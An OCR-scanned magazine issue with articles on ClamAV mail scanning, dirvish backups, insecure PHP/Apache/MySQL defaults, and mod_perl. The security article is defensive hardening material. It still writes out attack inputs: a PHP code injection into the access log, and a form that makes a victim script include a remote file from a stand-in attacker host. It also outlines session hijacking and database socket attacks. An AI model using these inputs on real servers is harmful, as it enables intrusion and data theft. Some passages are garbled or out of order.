packages to trigger a positive virus finding. It's distributed in
several forms, including within doubly zipped archives at
http://www.eicar.com/anti_virus_test_file.htm. This link itself will
trigger mod_clamav/mod_proxy and block the page from loading.

This is not proof of full virus protection but rather a trigger to 
ClamAV to see whether the software is installed and functioning. 



Listing 2 Postfix master.cf edits

Put the following lines in your Postfix main.cf file:

content_filter = scan:127.0.0.1:10025
receive_override_options = no_address_mappings

The content_filter tells Postfix to send all mail through the service
called 'scan' on port 10025. We'll set up clamsmtpd to listen on this
port later.

Next we add the following to the Postfix master.cf file:

# AV scan filter (used by content_filter)
scan      unix  -       -       n       -       16      smtp
        -o smtp_send_xforward_command=yes
# For injecting mail back into postfix from the filter
127.0.0.1:10026 inet  n -       n       -       16      smtpd
        -o content_filter=
        -o receive_override_options=no_unknown_recipient_checks,no_header_body_checks
        -o smtpd_helo_restrictions=
        -o smtpd_client_restrictions=
        -o smtpd_sender_restrictions=
        -o smtpd_recipient_restrictions=permit_mynetworks,reject
        -o mynetworks_style=host
        -o smtpd_authorized_xforward_hosts=127.0.0.0/8


Full proof of concept would be provided by "unbiased" third parties
such as http://www.virusbulletin.com/ (7). Since having software
evaluated by such an institution requires subscription fees, and most
open source projects don't have such a budget, it's not likely this
will happen for ClamAV in the immediate future. It might happen when
ClamAV becomes more widely used and a full test against commercial
packages is commissioned. I hope articles such as this one will advance
ClamAV down this path. (Check out the "who's using it" link on the
homepage for more information.)

What Next? 

Open source software has come a long way in the past decade from being
a midnight hacker's favorite toy to a financial institution's budget
saver and performance enhancer. While Linux, Apache, sendmail, BIND,
Perl, and the like have filled the spectrum of open source software
benchmarks, there has been a void in virus protection until the
emergence of ClamAV and similar projects.

ClamAV's model follows the Unix philosophy: it scans for viruses,
nothing more and nothing less (8). Its sole intent is to do this well
and let projects like mod_proxy and clamsmtp provide support for
connecting to other services. Likewise, I find my favorite software
packages to be those with wide support networks, such as Perl-CPAN and
Apache-modules. If these are any signs of what gives software
longevity, then ClamAV is well on its way to wide acceptance.

The curious might want to look at the sigtool application distributed
with ClamAV, which is used to manage the virus database files. It's
trivial to open a cvd file and grep the text definition files for a
virus name and signature. You might even find occasion to add your own
signatures to have certain files treated like viruses. For instance,
some admins don't want file sharing apps making it to the desktops.
Also worth noting is the libclamav library, which provides a completely
different option for linking programs with ClamAV (samba-vscan can use
this option).

Lastly, you can help out! This project has become so successful because
of its large contribution base. Make it even better by adding yourself
to that list (9). If you find a new virus, submit it to the database
via the link on the home page. This spirit and mentality could
potentially halt viruses for good!

Resources 

1. ClamAV home page: http://www.clamav.net/
2. Third-party software information:
   http://www.clamav.net/3rdparty.html
3. Samba source:
   http://www.openantivirus.org/projects.php#samba-vscan
4. Mod_clamav source: http://software.othello.ch/mod_clamav/
5. Clamsmtp: http://memberwebs.com/nielsen/software/clamsmtp/
6. ClamWin: http://www.clamwin.com/
7. Virus Bulletin: http://www.virusbulletin.com/
8. Unix Philosophy: http://www.faqs.org/docs/artu/ch01s06.html
9. ClamAV FAQ and mailing lists:
   http://www.clamav.net/faq.html#pagestart
10. Author Notes: http://www.i-kong.com/clamav

Jinn lives in and runs his consulting business from Jersey City, NJ. He currently
spends way too much time trying to turn his PC into the ultimate PVR 
Multimedia machine, but when he does tear himself away from his computer, he 
enjoys the dancing nightlife in NYC. He can be reached at.' j Ul)bOX.@i -kOUQ. COfll 
BACKUPS


Dirvish for Disk-to-Disk Backups — An Open 
Source Success Story 

Keith Lofstrom 


What will you do if a company that produces one of your critical
software applications goes out of business? If it's proprietary
software, you may be in big trouble. Open source, on the other hand,
leaves you in control (sometimes, too much control). This article tells
how I ended up managing an open source backup tool, dirvish.

My integrated circuit design consultancy, KLIC, uses Linux and other
open source software for nearly all important tasks. One critical task
is backup: I cannot afford to lose days of work to a disk crash or a
typing error. In 2003, I moved from tape-based backups of individual
machines to network-based disk-to-disk backups. After some experiments
using rdump to swappable hard-disk media, J.W. Schultz told me about
his disk-to-disk backup program called dirvish. Dirvish is a Perl
wrapper around another open source tool, rsync.

Rsync and Dirvish 

Rsync copies and maintains images of file systems between computers.
Rsync can be used for mirrors, copies, and backups. With rsync, files
are not just moved and copied, but are segmented, checksummed, and
compared between source and destination machines. Only data segments
with changed checksums or modification dates are moved. Rsync's
--link-dest option permits Unix-style hard links to files in other
directories on the destination machine. Hard-linking allows successive
backup images to share identical data files and occupy the same disk
space.
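The space sharing between backup images can be illustrated with a small
Python sketch. It is not dirvish or rsync code; the function names and
the "monday"/"tuesday" image directories are invented for the example,
and it links every file, whereas rsync's --link-dest links only the
files that have not changed and transfers the rest.

```python
import os
import tempfile


def make_linked_image(previous_image, new_image):
    """Build new_image as a tree of hard links to files in previous_image.

    Illustration only: every file is linked, as if nothing had changed
    between the two backup runs.
    """
    for root, _dirs, files in os.walk(previous_image):
        rel = os.path.relpath(root, previous_image)
        target_dir = os.path.normpath(os.path.join(new_image, rel))
        os.makedirs(target_dir, exist_ok=True)
        for name in files:
            os.link(os.path.join(root, name), os.path.join(target_dir, name))


def demo():
    """Return (same_inode, link_count) for a file shared by two images."""
    with tempfile.TemporaryDirectory() as top:
        monday = os.path.join(top, "monday")    # hypothetical image names
        tuesday = os.path.join(top, "tuesday")
        os.makedirs(os.path.join(monday, "etc"))
        with open(os.path.join(monday, "etc", "hosts"), "w") as handle:
            handle.write("127.0.0.1 localhost\n")
        make_linked_image(monday, tuesday)
        old = os.stat(os.path.join(monday, "etc", "hosts"))
        new = os.stat(os.path.join(tuesday, "etc", "hosts"))
        return old.st_ino == new.st_ino, new.st_nlink
```

Both directory entries point at one inode, so the second image costs a
directory entry rather than a second copy of the data.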

Hard disk backup storage, and the linkage between backup images, have
other benefits for my consulting business. Some consulting contracts
require that all copies of client data be removed at the end of the
project. This is impossible with tape-based backup: I cannot remove one
client's data and email without wiping all my backup tapes. With my
backup data stored as a regular file system on disk, all I have to do
is write over the client files; everything hard-linked to those files
is written over as well.

Rsync typically uses SSH for secure transport between machines and sets
up multiple data pipelines to reduce latency. Rsync has been ported to
most flavors of Unix, and rsync clients are also available for Windows
and Macintosh. Rsync is the execution engine for many new backup
systems, including dirvish.

Dirvish adds configuration-driven automation to rsync, making it
suitable for cron-driven nightly backups, driven by a central backup
server. Dirvish permits networks of similar machines to share portions
of the backup images that are identical. Dirvish also has a
sophisticated expiration process for removing selected older images and
recovering backup drive space.

Control of the backup process by the central backup server is critical.
Client-driven backup schemes are possible, but this compromises
security and performance. Rsync is network-intensive, and only the
server can properly sequence client backups to control network loading.
The backup server must be absolutely safe from compromise: since it
contains images of all clients, it represents a single-point security
risk for the entire network. Fortunately, a dirvish backup server can
be configured to perform only the outbound SSH connections necessary to
rsync to the clients, while ignoring all inbound service requests. This
makes the backup machine ("server" may be a misnomer) difficult to
attack.

I use dirvish to perform nightly backups of half a dozen machines
(about 100 GB total data), on-site and remote, in about one hour. My
system data changes infrequently. Given the efficiencies brought by
hard-linking between images, I can store 200 or more nightly images on
a 250-GB backup drive on my main server. With large IDE hard drives
selling for less than 60 cents per gigabyte, I have greatly reduced the
cost and bother of making nightly backups.

A worst-case failure might destroy both the server and the backup drive
in it. I have multiple IDE backup drives in hot-swappable, removable
trays (e.g., see http://www.vipower.com). I then rotate the drives to a
fire-resistant safe each day. By rotating the backup drives to the safe
(which is easy with hot-swap), even worst-case failures or full
security breaches are survivable.

Bare-Metal Recovery 

Backup is only half the problem, of course; rebuilding a crashed hard
drive is every sys admin's nightmare. I build backup drives with a 5-GB
bootable Linux partition and a 2-GB swap partition, slightly reducing
the size of the main backup partition. For a bare-metal server
recovery, I boot from the backup drive and use simple scripts to
rebuild the main server hard drive. A client drive can be rebuilt in a
third server drive bay, from a second drive bay on the client, or on a
different machine entirely. Full restores now take five minutes of
configuration work, followed by a couple of hours of disk-to-disk
copying.
Windows and Macintosh OS X drives may be more difficult to restore from
bare metal. These file systems are not fully supported by Linux, so the
restores must be performed natively, on a live Windows or Macintosh
machine, to a second empty disk. This can be done over the network with
rsync, but the process will involve careful sequencing of scripts at
both ends.

The situation is tolerable for Macintosh OS X. There is rsync support
for both UFS/FFS and the older HFS file system. It should not be
difficult to run dirvish and its associated scripts natively on one
machine under OS X, or between OS X machines (although I have not tried
this). If the backup drive is connected with USB2, then hot-swaps can
be performed with USB2 mount and unmount.

On Windows, some files may not be accessible to rsync for read and
write. This is an intentional "feature" of Windows; Microsoft does not
want it to be easy to copy their proprietary code. Microsoft or other
third-party licenses may forbid backing up their software to another
hard disk.

If you are backing up purchased, proprietary programs or 
information, you may be legally restricted in what you may back 
up and how you may do it. Digital Rights Management hardware 
and software may add further complications. Consult your 
licenses and your lawyers. 

These complications are part of the cost of running proprietary
operating systems that use file systems without open specifications. We
can still restore most user-created Windows files and directories over
the network, and that should be good enough for helping most Windows
users maintain their data integrity day-to-day. If Windows users want
robust, inexpensive, easy-to-maintain, legally unencumbered, and
technologically advanced solutions to their problems, they may want to
consider open source offerings.

Dirvish is a great tool. It's a little rough around the edges and needs
better documentation, but it's turned a big backup chore into a small
one. Other users have also found J.W. Schultz's open source software
project very useful. In gratitude, I prepared slide talks and writeups
of my experiences with dirvish and presented them at user groups and
conventions. J.W. was very helpful in critiquing and improving these
presentations.


And Then It All Changed... 

The technical editor of Sys Admin magazine, Hal Pomeranz, attended one
of my presentations and asked me to write an article about dirvish for
the October 2004 issue on backups. I wrote excitedly to J.W. to invite
him to co-author the article, which would be a real boost to his
consulting company, Pegasystems Technologies. Strangely, there was no
response. With the due date for the article looming, I had to tell Hal
that no article was possible without the original author of the code.

All I knew about J.W. was that he was a middle-aged consultant in the
San Francisco Bay Area, a good Perl coder, and a fan of the former U.S.
space program. I didn't even know his first name or his phone number.
Even his site registration was anonymous. In the open source community,
this really doesn't matter much, until you want to find someone.

The original download site for dirvish, http://www.pegasys.ws, went off
the air sometime in May. In June, as a precaution, I registered the
domains "dirvish.org" and "dirvish.com". If J.W. reappeared, the
domains would go to him. After another month without news, I took an
archived version of the site (from September 2003) and activated the
domains on my Web server. I patched in the latest version of the
dirvish Perl code from the Debian archives. Later versions of pegasys
are now beginning to appear at http://www.archive.org.


In July 2004, I was told of a March Sacramento newspaper article
describing the death of software consultant Jonathan W. Schultz of
Antioch, California, by drowning in Lake Mead. I have since made
contact with Jon's parents. Jon was 42 when he died. He was reclusive,
yet he had Internet friends all over the world. He contributed heavily
to the development of rsync. He was a devout Christian and will be
missed by many.

Jonathan was a natural coder who could think in Perl. I once asked him
if I could annotate the dirvish Perl code with comments. He replied,
"If the code is so littered with comments as to call for a grep -v to
make it readable as code, the comments should be removed. You should
edit the same code that you read." As Jon's father later explained, "He
once told me that when he looked at the printout, it was like looking
at a picture of a person, and if something was in the wrong place or
malformed it would be very obvious to him. This was a God-given gift
that neither of us understood...".

Most programmers do not have that gift, and Perl is a very rich
language, making it more difficult to read than other languages. J.W.'s
death left dirvish users and developers in a quandary: where do we go
with dirvish? How can we improve mission-critical code that we control
but do not fully understand?

Continuing the Work 

The custom in the open source community is that if the originator of a
software package disappears or loses interest, another may take up the
code and continue. While I am a mediocre coder, and a Perl newbie, I
have managed technical projects and am better than most at technical
communication. Since management and communication are dirvish's
greatest needs, I took temporary control of the dirvish project.
Perhaps a better leader will emerge in time.

And I am diving deep into Perl. Randal Schwartz's books Learning Perl
and Perl Objects, References, and Modules have been invaluable to my
education, and his regular column in Sys Admin has been useful as well.
The Portland-area Perl community is very supportive, and when I don't
understand something, there are plenty of people to help.

I set up a wiki at http://www.dirvish.org/wiki, where users and
contributors can add their information, patches, and requests for
enhancements. In just a few months, there have already been some great
contributions. We are accumulating patches for a small experimental
release, while we develop techniques for testing the code for future
general releases. By the time you read this, we should have an active
mailing list.

There are still important management issues to address. The code needs
more comments; ordinary programmers must be able to read it. We may
veer from J.W.'s "no comment" approach to make the working environment
safer. I am writing a design description of the software for the wiki.
The configuration file format is confusing, with some things becoming
Perl scalars and other things becoming lists in an overly restrictive
way; we need to make the configuration task easier.

Finally, additional tools need to be created or borrowed from other
packages. A more automated restore system is needed, one that easily
adapts to changing partition needs and permits the selection and mixing
of different backup images. Single-file restore should be driven by
users, with minimal intervention by systems administrators.

I may make all of these things happen, or none of them. Since dirvish
is an open source software package, others are free to contribute
improvements, bug fixes, or whole new interfaces. If others discover
problems, they are free to discuss them in public and seek help from
members of the dirvish community. Testing results are public; if
something doesn't work, users can learn about the problem quickly. If I
mismanage the project, others are free to fork the code, rename it, and
abandon me to the contemplation of my errors.

Free software is about freedom and allows you to make your 
own right (or wrong) decisions or delegate them to the organizations 
that you choose. It gives you control. Free software is also about the 
benefits of cooperation and contribution. Even if you have a lot of 
clout with a proprietary software vendor, you are unlikely to get the 
enhancements you need, when you want them, and how you want 
them. The most direct way to get what you need in an open source 
package is to design and program the enhancements yourself. In the 
worst case, the enhancement you offer may get rejected by the 
maintainer and the other users; you can still apply your patches to 
your own version. A more likely outcome is that some of the other 
users will agree with you, and you can test, maintain, and improve 
your patch with others. 

However, the most likely outcome is that your improvement will be
gratefully accepted by maintainer and users alike and result in a
cascade of improvements on your improvement. The maintainer will
probably be grateful for the contribution, and other users are likely
to have the same needs you do. You will not have to fight your way
through layers of managers and marketers, and you will not have to fit
some vendor's strategic plan. The needs of the contributors always
outweigh the hypothetical needs of "future customers". Best of all,
others will test your code in widely varying situations; by sharing
your code, many mistakes will be found and corrected by others, before
they affect you and your company.


Conclusions 

Your contribution does not need to be large; it can be as simple as a
single line of code, another test case, or even a spelling correction.
The main difference between a successful or unsuccessful contribution
is your own understanding of the intent of the software and how the
community already uses it, and your willingness to cooperate with
others. Please help us develop dirvish and rsync. Join us on the wiki
at http://www.dirvish.org/wiki and discuss your needs, share your
experiences, and offer your enhancements.

In the second part of this series, I'll discuss how to install and
configure dirvish. I will set up an example network and install
hardware and software to do dirvish disk-based backups. In the third
part of the series, I will use these backups to do bare-metal restores
of client and server hard drives.

Resources 

KLIC: http://www.kl-ic.com

Dirvish: http://www.dirvish.org

Dirvish Wiki: http://www.dirvish.org/wiki

Keith Lofstrom (http://www.keithl.com) owns an integrated circuit
design consultancy in Beaverton, Oregon. His specialty is mixed-signal
and statistical design for deep submicron processes, as well as design
for testability using the IEEE 1149.x standards. Keith has been using
some flavor of Unix since 1980, and although he admits to a brief
flirtation with DOS and Windows, he has seen the error of his ways. He
is currently managing the dirvish backup program.
SECURITY


Insecure by Default 

Lukasz Wojtow 


It seems so easy: download Apache, throw PHP together with some
database, and you have a new server for dynamic Web pages. It's true:
building Web servers has never been easier or cheaper. The price paid
for ease of use and installation, however, is loose configuration,
designed to avoid problems on startup rather than to be the most
secure. This article describes how configuring MySQL, PostgreSQL, PHP,
and Apache with their default settings can lead to security breaches.
Some of the issues covered apply only to shared hosting, where an
attacker owns a virtual host and has unprivileged, local access to the
system.

The software described in this article is Apache (v1.3.31), PHP
(v4.3.8), MySQL (v4.0.20), and PostgreSQL (v7.4.5). All components are
installed from source with default options; PHP is installed as a DSO
module, and Linux 2.6 is used as an operating system.

A main worry for Web administrators is so-called "remote code 
inclusion”. When this happens, attackers can include any code and 
execute it in the server context. The consequences are endless, and 
unrestricted viewing of scripts’ variables (like password to database) 
is one of the least dangerous. Exploiting remote code inclusion can 
take two forms: 

* Including truly remote files through HTTP/FTP protocol.

* Including local files with content controlled by a remote attacker.

The first attack is possible because of the most often abused PHP
option, allow_url_fopen, which according to the configuration file
(usually /usr/local/lib/php.ini) is switched "On" by default. This
option allows the inclusion and execution of remote files as if they
were local, a favorite technique of attackers. Very few sites really
need this capability, so switching it "Off" globally and switching it
"On" only in cases where it's really needed is a good idea. The second
approach is used when a script checks for a file's existence (the
function file_exists() does not work for remote files in PHP 4.x) and
then includes it. Webmasters often forget that attackers have influence
over at least one local file: the server log.

Appending the argument ?dummy='<?php;phpinfo();?>' to the URL places
PHP code in the access_log. After including the access_log file in
another request, the phpinfo() function will be executed. The server's
log path is not an issue here because one of the symbolic links in
/proc/self/fd/ points to the correct file. This capability exists
because of the server logs' default permissions; they are
world-readable:

# ls -l /usr/local/apache/logs/*
-rw-r--r-- 1 root root 8186 2004-10-03 16:43 \
    /usr/local/apache/logs/access_log
-rw-r--r-- 1 root root 12613 2004-10-03 16:43 \
    /usr/local/apache/logs/error_log

This should be changed immediately after installation, not only to stop
the described attack technique, but as a protection against brain-dead
scripts that pass confidential data in GET arguments.
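The permission check can also be scripted. The following Python sketch
is one possible approach, not part of Apache; the helper names are made
up for the example, and the demonstration runs on a temporary stand-in
file rather than a real log.

```python
import os
import stat
import tempfile


def is_world_readable(path):
    """True if the 'other' read bit is set on path."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def restrict_log(path):
    """Clear all 'other' permission bits, keeping owner and group bits."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    os.chmod(path, mode & ~stat.S_IRWXO)


def demo():
    """Return (readable_before, readable_after, final_mode)."""
    with tempfile.TemporaryDirectory() as top:
        log = os.path.join(top, "access_log")  # stand-in for the real log
        with open(log, "w") as handle:
            handle.write("GET /index.php HTTP/1.0\n")
        os.chmod(log, 0o644)  # same mode as in the listing above
        before = is_world_readable(log)
        restrict_log(log)
        after = is_world_readable(log)
        return before, after, stat.S_IMODE(os.stat(log).st_mode)
```

On a real server the same two helpers would be pointed at the files in
the Apache logs directory, run as root.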

When it comes to exploiting remote inclusions, attackers usually change
the URL in a browser's address bar. This approach is fast and
convenient but has one huge drawback: it is logged. To hide suspicious
parameters, attackers take advantage of two PHP settings: the option
"register_globals", which for compatibility reasons is usually turned
"On" after installation (88% of servers); and the option "gpc_order"
(or "variables_order" in newer versions). The former makes all request
variables available to a PHP script as "$option_name", and the latter
sets the overriding order for variables with the same name (including
GET, POST, COOKIE, etc.).

With the default value of "GPC", GET variables will be overridden by
POST and then by COOKIE. So, if a script receives a variable of the
same name twice (once as GET and once as a cookie), the variable will
be set to the value from the cookie. That is, if an attacker wants to
set the script's argument "file" to his file, the GET argument should
remain unchanged (say "offer.html"), but the cookie should contain a
reference to the attacker's file. This way, the attack will be logged
like other legitimate visits and the administrator will have no chance
to spot it. If the script accepts POST data, including the value in a
form can also be used:

<form method="post" action="http://victim.com/show.php?file=offer.html">
<input type="text" name="file" value="http://hacker.org/attack.txt">
<input type="submit">
</form>

Changing the "gpc_order" value to "CPG" will not stop attackers, but at
least the systems administrator will be able to see that something is
wrong (like finding a script that is always called with the include=
argument being called without it).
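The effect of the ordering string can be modelled in a few lines of
Python. This is a simplified model, not PHP's implementation: the
function name is invented, and only the letters G, P, and C are
handled. Sources named later in the string overwrite same-named
variables from earlier ones.

```python
def resolve_request_variables(order, get=None, post=None, cookie=None):
    """Merge request sources in the sequence given by order, e.g. "GPC".

    Later sources overwrite same-named variables from earlier ones.
    """
    sources = {"G": get or {}, "P": post or {}, "C": cookie or {}}
    merged = {}
    for letter in order:
        merged.update(sources[letter])
    return merged


# The logged GET argument looks harmless; the cookie carries the payload.
request = {
    "get": {"file": "offer.html"},
    "cookie": {"file": "http://hacker.org/attack.txt"},
}
with_gpc = resolve_request_variables("GPC", **request)
with_cpg = resolve_request_variables("CPG", **request)
```

With "GPC" the script sees the cookie value; with "CPG" the GET value
wins, so an attacker has to put the payload in the URL, where it ends
up in the log.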

It would be naive to think that PHP does not provide any configuration
options to make it secure in multi-homed environments. And, indeed,
there is a set of file system limitations called "safe mode". This
feature has had some security problems but is designed for ISP servers
and definitely should be turned on. It is disabled on 79% of servers
(see Table 1).

Running PHP with safe mode and CGI scripts with Apache-supported suExec
(which changes process uid before executing CGI) seems to provide good
protection against the abuse of Web server privileges. Unfortunately,
it is not perfect under the default configuration. When safe mode is
enabled and suExec deployed, *.php files are not world-readable; they
belong to their users and to a special group that lets Apache processes
read them. But the option "FollowSymLinks" in httpd.conf provides an
opening for attackers.

Using a CGI script, an attacker can create a symlink (with extension
.txt) pointing to any file in any other domain. If the symlink is
requested by the attacker, the file it points to will be displayed. The
simplest way to fix this is by enabling the option
"SymLinksIfOwnerMatch" in place of "FollowSymLinks" in the
configuration file.

One of the most common tasks for PHP scripts is authenticating 
users. This is usually done by PHP's built-in “sessions" feature. For 
example, a logging script checks the username and password and, if 
they match, sets the variable “logged" to “true". All other scripts in 
this domain will then receive this variable and grant access to the user: 


<?php
if ($_SESSION['logged'] == true) {
    // user already logged in
} else {
    // user not logged in
}
?>

This seems secure, because users cannot set session variables remotely,
but a problem arises on shared hosting. Session files for all virtual
servers reside in one location: by default, the /tmp directory (on 86%
of servers). As a result, the PHP engine has no way of distinguishing
which virtual server started a particular session.

If an attacker knows the name of the checked variable ("logged" in the
previous example), then this variable can be set by his domain hosted
on the server. Appending PHPSESSID from the attacker's domain in
requests to the victim's domain will result in bypassed authentication.
One solution is to set a different session.save_path for each virtual
server.

Because the /tmp directory is world-readable, however, keeping session
files there results in another problem. Even if every single script
checks the username and the password, authentication still can be
bypassed:

<?php
include('functions.inc.php');
if (password_correct($_SESSION['user'], $_SESSION['password'])) {
    // password correct
} else {
    // password incorrect
}
?>

An attacker can list files in the /tmp directory from time to time and
look for new sessions being created. One of them will surely belong to
a user freshly logged into the victim's site. Session files are named
after their ids, so listing files gives the attacker everything
necessary to hijack the session. In my view, it is bizarre to keep
these files in a directory like /tmp where everybody with local access
can see them.

Sharing this directory is generally a bad idea, but there is yet 
another problem with it. By default. MySQL and PostreSQL use 
this directory for their sockets, and every PHP script connects to the 
database through them. PHP has no way to find out whether sockets 
were actually created by database daemons. Because the /tmp direc¬ 
tory is world-writable, they could be created by anyone. That means 
that scripts can give away passwords or display Web pages with 
data taken from a fake database. 
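
Whether a given directory is exposed in this way can be checked from its permission bits. The following is a minimal Python sketch, not part of the original article; the function name world_access is made up for illustration, and it assumes a Unix-like system where the "other" permission bits are meaningful.

```python
import os
import stat


def world_access(path):
    """Return (readable, writable) for users who are neither owner nor group."""
    mode = os.stat(path).st_mode
    # S_IROTH / S_IWOTH are the "other" read and write permission bits.
    return bool(mode & stat.S_IROTH), bool(mode & stat.S_IWOTH)
```

Calling world_access on the directories named in session.save_path and in the database socket settings gives a quick way to spot locations that any local user can list or write to.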


Table 1 Default options remain insecure on the majority of servers

Option Name (Insecure Value)      % of Servers with Insecure Value
allow_url_fopen (On)              93%
safe_mode (Off)                   79%
session.save_path ('/tmp')        86%
mysql.allow_persistent (On)       66%

The first issue of the new year is typically the one we dedicate to open source
topics. This issue is no exception, and it features articles describing open source
tools that, among other things, scan your network for viruses, perform disk-to-disk
backups, enforce IP access policy, and distribute DNS data to multiple servers.
Also in this issue, Bryan Smith begins a two-part article examining the terms open
and proprietary, which are generally used to categorize software. He proposes new,
more distinct labels and assesses the associated deployment risks of the various
types of software.

If you're interested in following other open source vs. proprietary battles, the
Groklaw site at: http://www.groklaw.net provides daily updates and commentary
along with historical perspective on the machinations surrounding the SCO
controversy and related issues. It's worth a moment to check out the current state
of affairs there.

Sys Admin magazine recently adopted a new online look. I invite you to visit the
Sys Admin Web site at: http://www.sysadminmag.com and see what you think.
We're still fixing a few trouble spots, so be sure to send feedback if you see broken
links or other problems. We're in the process of converting UnixReview.com to this
new format as well, so look for it to be updated in the near future.

Also, just in time for holiday shopping, Version 10 of the Sys Admin back issue
CD-ROM is now available. It includes complete articles and code from the magazine's
premiere issue in 1992 through December of 2004. It also includes The
Perl Journal archives from 1996 through 2002 and offers both HTML and ASCII
versions of the content. As in the past, a few articles do not appear on the CD
either because we couldn't track down the authors to request permission or
because they chose not to have their content included. The back issue CD can be
ordered online through the Sys Admin Web site for $49.95 ($24.95 for registered
owners of the previous version). See page 58 for more information.

If you'd like to see an article of yours included in a future Sys Admin CD, you
can begin by sending a manuscript proposal to our managing editor, Rikki
Endsley, at: rendsley@cmp.com. Currently, we're looking for articles on spam
management, clustering, remote access, and database management, but other
topics will be considered. Please send questions or comments to Rikki or to me
at: aankerholz@cmp.com.

Sincerely yours, 

Amber Ankerholz 

Editor in Chief 

If an attacker manages to create his own sockets, the consequences
can be serious, so sockets should be kept somewhere else.
To avoid this potential attack, a few steps must be taken. First, two
directories must be created: one for the MySQL socket and one for the
PostgreSQL socket. Neither directory should be world-writable. Second,
the software must be told to use these directories.

In MySQL's config file (/etc/my.cnf), the option "socket" must
be changed (in both sections, [client] and [server]). To inform
PHP of the change, the option "mysql.default_socket" in the PHP
config must be updated as well. Unfortunately, the PostgreSQL case is a bit
more complicated. The simplest way to change the default socket
directory is to alter the definition of DEFAULT_PGSOCKET_DIR in
the PostgreSQL sources, in the file src/include/pg_config_manual.h
(about line 168), then rebuild and reinstall the database.

Other database options can also cause problems. It is well
known that connecting to a database is a time-consuming task. To
speed up this process, persistent connections are used. After persistent
connections are established, all details are kept by the PHP
engine between requests to a particular Apache child process. If a
script wants to connect to the database again, it receives the connection
that was established the last time.

A problem arises because of the way Unix-like systems treat
file descriptors. First, they are inherited after executing a new
program; second, they are represented by integer numbers in a
process. Neither MySQL's nor PostgreSQL's client sockets are
marked as close-on-exec, which means they can be inherited by
any program executed by an Apache child process. All an
attacker has to do is upload a malicious script to the server and
keep making requests to it over HTTP. If a request is
accepted by a child process that previously had established persistent
connections for other domains, the attacker will get access
to these databases. Details about this attack with a sample program
for MySQL (PostgreSQL is also affected) are available
from: http://bugs.mysql.com (bug id 3779). This attack is possible
only when persistent connections are allowed, which is the case on about
66% of servers.
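
The close-on-exec flag mentioned above can be inspected and set with fcntl. The sketch below is in Python rather than the C of the database client libraries, and the two helper names are invented for illustration. It assumes a Unix-like system. Python creates sockets as non-inheritable by default, so a test has to call set_inheritable(True) first to reproduce the situation described here.

```python
import fcntl
import socket


def is_close_on_exec(sock):
    """True if the descriptor will be closed when the process calls exec()."""
    flags = fcntl.fcntl(sock.fileno(), fcntl.F_GETFD)
    return bool(flags & fcntl.FD_CLOEXEC)


def set_close_on_exec(sock):
    """Mark the descriptor close-on-exec, keeping any other descriptor flags."""
    flags = fcntl.fcntl(sock.fileno(), fcntl.F_GETFD)
    fcntl.fcntl(sock.fileno(), fcntl.F_SETFD, flags | fcntl.FD_CLOEXEC)
```

A descriptor without this flag stays open in any program the process executes, which is the condition the attack relies on.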

Persistent connections are entirely PHP's responsibility and can
be switched off by setting the options "mysql.allow_persistent" and
"pgsql.allow_persistent" to "Off" in PHP's config file.

I hope this article will be useful as a post-installation checklist.
As I've shown, the default configuration of software is not always
secure, but these problems can often be solved by choosing the
proper options in configuration files. Open source software is popular
for its low cost, robustness, and ease of use. The only thing
remaining is to tighten its security for your specific needs.

Resources

Apache Web server: http://www.apache.org
PHP server-side language: http://www.php.net
MySQL database: http://www.mysql.com
PostgreSQL database: http://www.postgresql.org
Close-on-exec MySQL discussion: http://bugs.mysql.com/bug.php?id=3779
Vinesys security survey: http://www.vinesys.net/surveys/ibd.html

Lukasz Wojtow has a BSc in Computer Science from The College of
Management and Public Administration, Zamosc, Poland, and is starting his
Masters in London next year. His main interests are security and programming,
and in his free time he enjoys walks in Hyde Park and flies the F-16 (simulator
only). He can be reached at: ? w@vtsz i3. edu. p 1.

The Magic of mod_perl

Frank Wiles


I often run into people who are confused about what mod_perl is.
Some people think mod_perl is only useful to speed up CGI
scripts. Some oddly believe it to be a heretical and incompatible
version of the Perl programming language, while others are very
confused and think mod_perl is just another fancy way of saying
Perl/CGI. Fortunately, all of them are wrong. With the upcoming
release of mod_perl 2.0 (mod_perl 2.0 is very near release as of the
writing of this article and likely will be released before this is published),
I wanted to better explain mod_perl.

In short, mod_perl embeds a Perl interpreter directly into your
Apache Web server. It does have the wonderful added benefit of
speeding up your CGI scripts, but that is just a taste of its power. The
real power of mod_perl is the ability for you to directly use all of the
Apache API from Perl. This is also what sets mod_perl apart from
other similar technologies such as PHP (mod_php) and Python
(mod_python), which only allow you to control the content or
response phase of the Apache server.

When a browser requests a page from an Apache server, the request
goes through several processing phases. Some are related to access,
authentication, and logging, but the most common is the response phase.
The response phase is what you work with when building a Perl
CGI or a PHP script. It is the part of the process that generates the
actual HTML page and returns it to the browser.

The power of mod_perl is that it gives you the ability to
replace the default behaviors of any of these phases with your
own phase handlers. mod_perl handlers can be thought of as
true Apache modules, plugged directly into the server, rather
than a script or other outside process. Each handler is a different
Perl module that you have written to deal with a particular
phase. This can also help code reuse by allowing you to share a
particular logging or authentication handler on many different
sites or servers without having to alter any other aspects of the
Apache process.

Here are some examples of mod_perl's abilities:

• Log all requests to http://www.domain.com/admin/ into a SQL
database, thus capturing the information we care about and still
logging the rest of the site to the normal Apache log file for traffic
analysis.

• Replace Apache's flat file Basic auth with a SQL database that
controls access both by username/password as well as by date and
time of the request. This could be used to allow employees access
to an application only during office hours.

• mod_perl gives you the ability to configure your Apache Web
server with Perl code. Use this to easily configure a large number
of Virtual Hosts by querying a database instead of manually configuring
them in httpd.conf.

• Apache filters allow you to filter the output of any flat file, a script
written in another language, or even another mod_perl handler before
sending the page on to the browser. This can be used to clean up the
output of a legacy system without having to modify the original code.

• Because Apache 2.0 is protocol agnostic, you can even make your
server speak protocols other than HTTP. An example of this is to
build an SMTP server in mod_perl and a corresponding Web application
to control how it operates.

Installation

Installing mod_perl is a relatively easy task. If you are using a
recent Linux distribution, you may have it installed already. mod_perl
2.0 does have some prerequisites, namely a recent Perl and Apache 2.x.
If both of these are already installed, all that is required is
downloading the mod_perl source code from
http://perl.apache.org/download/ and issuing the following commands:

# tar -xvzf mod_perl-2.x.xx.tar.gz
# cd mod_perl-2.x.xx
# perl Makefile.PL MP_APXS=/path/to/apxs MP_INST_APACHE2=1
# make
# make test
# make install

Once mod_perl is installed, you will need to configure it in your
httpd.conf by adding the following configuration options:

LoadModule perl_module modules/mod_perl.so
PerlRequire /path/to/perl/libs/startup.pl

The startup.pl script allows you to set up your @INC library path
and preload any modules that you want shared among your
Apache server children. For the following examples, I'm using
the minimal startup.pl:

